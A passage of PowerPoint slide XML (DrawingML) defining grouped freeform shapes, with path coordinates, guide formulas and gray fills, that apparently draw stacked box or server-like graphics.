                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="538"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="496"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="297"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="297"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="496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42" name="Freeform 457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940" y="2220"/>
                    <a:ext cx="868" cy="458"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 541"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 267 h 541"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 541 h 541"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 541"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 541"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 498 h 541"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 541"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 42 h 541"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 300 h 541"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 300 h 541"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 498 h 5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025" h="541">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="267"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="541"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="498"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="498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43" name="Freeform 458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940" y="1996"/>
                    <a:ext cx="868" cy="456"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 539"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 265 h 539"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 539 h 539"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 539"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 539"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 496 h 539"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 539"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 40 h 539"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 298 h 539"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 298 h 539"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 496 h 5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025" h="539">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="539"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="496"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="298"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="298"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="496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44" name="Freeform 459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1940" y="1770"/>
                    <a:ext cx="868" cy="458"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 541"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 267 h 541"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 541 h 541"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 541"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 541"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 499 h 541"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 541"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 43 h 541"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 300 h 541"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 300 h 541"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 499 h 5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025" h="541">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="267"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="541"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="499"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="499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140" name="Freeform 460"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="1711"/>
                  <a:ext cx="1081" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 343"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 343"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 343"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 343"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="343">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="545554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48" name="Group 461"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2804" y="1945"/>
                <a:ext cx="1293" cy="1245"/>
                <a:chOff x="2804" y="1945"/>
                <a:chExt cx="1293" cy="1245"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1049" name="Freeform 462"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="1945"/>
                  <a:ext cx="1293" cy="1245"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 258 w 1535"/>
                    <a:gd name="T1" fmla="*/ 0 h 1472"/>
                    <a:gd name="T2" fmla="*/ 0 w 1535"/>
                    <a:gd name="T3" fmla="*/ 69 h 1472"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T9" fmla="*/ 411 h 1472"/>
                    <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T11" fmla="*/ 343 h 1472"/>
                    <a:gd name="T12" fmla="*/ 258 w 1535"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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35" h="1472">
                      <a:moveTo>
                        <a:pt x="258" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="1472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C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50" name="Freeform 463"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="2813"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 410"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 410"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 410"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 410 h 410"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 4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5" h="410">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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51" name="Group 464"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2891" y="2711"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1113" name="Group 465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645" y="1918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1126" name="Freeform 46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27" name="Freeform 467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28" name="Freeform 46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114" name="Group 469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735" y="1942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1123" name="Freeform 47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24" name="Freeform 471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25" name="Freeform 47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115" name="Group 473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825" y="1966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1120" name="Freeform 47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21" name="Freeform 475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22" name="Freeform 47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116" name="Group 477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915" y="1990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1117" name="Freeform 47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18" name="Freeform 479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19" name="Freeform 48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1052" name="Freeform 481"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="2591"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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53" name="Freeform 482"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="2364"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 343 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 343 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="343"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343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54" name="Freeform 483"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="2140"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340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55" name="Group 484"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2891" y="2262"/>
                  <a:ext cx="1063" cy="416"/>
                  <a:chOff x="4645" y="1768"/>
                  <a:chExt cx="356" cy="139"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1097" name="Group 485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735" y="1792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1110" name="Freeform 48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11" name="Freeform 487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12" name="Freeform 48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098" name="Group 489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645" y="1768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1107" name="Freeform 49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08" name="Freeform 491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09" name="Freeform 49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099" name="Group 493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825" y="1817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1104" name="Freeform 49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05" name="Freeform 495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06" name="Freeform 49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100" name="Group 497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915" y="1840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1101" name="Freeform 49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02" name="Freeform 499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03" name="Freeform 50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1056" name="Group 501"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2891" y="2026"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1081" name="Group 502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645" y="1918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1094" name="Freeform 503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95" name="Freeform 50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96" name="Freeform 505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082" name="Group 506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735" y="1942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1091" name="Freeform 507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92" name="Freeform 50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93" name="Freeform 509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083" name="Group 51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825" y="1966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1088" name="Freeform 511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9" name="Freeform 51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90" name="Freeform 513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084" name="Group 514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915" y="1990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1085" name="Freeform 515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6" name="Freeform 51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7" name="Freeform 517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1057" name="Group 518"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2891" y="2481"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1065" name="Group 519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645" y="1918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1078" name="Freeform 52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9" name="Freeform 521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0" name="Freeform 52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066" name="Group 523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735" y="1942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1075" name="Freeform 52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6" name="Freeform 525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7" name="Freeform 526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067" name="Group 527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825" y="1966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1072" name="Freeform 528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3" name="Freeform 529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4" name="Freeform 530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068" name="Group 531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915" y="1990"/>
                    <a:ext cx="86" cy="68"/>
                    <a:chOff x="1315" y="1508"/>
                    <a:chExt cx="596" cy="469"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1069" name="Freeform 532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0" name="Freeform 533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1" name="Freeform 534"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"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2420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1058" name="Group 535"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2804" y="2002"/>
                  <a:ext cx="1078" cy="1188"/>
                  <a:chOff x="4616" y="1681"/>
                  <a:chExt cx="361" cy="397"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1061" name="Freeform 536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4616" y="1906"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 566 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 240 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 42 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 368 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 368 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 566 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="566"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="240"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="566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62" name="Freeform 537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4616" y="1831"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 565 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 565 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="565"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="565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63" name="Freeform 538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4616" y="1756"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 567 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 567 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="567"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="567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64" name="Freeform 539"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noEditPoints="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4616" y="1681"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
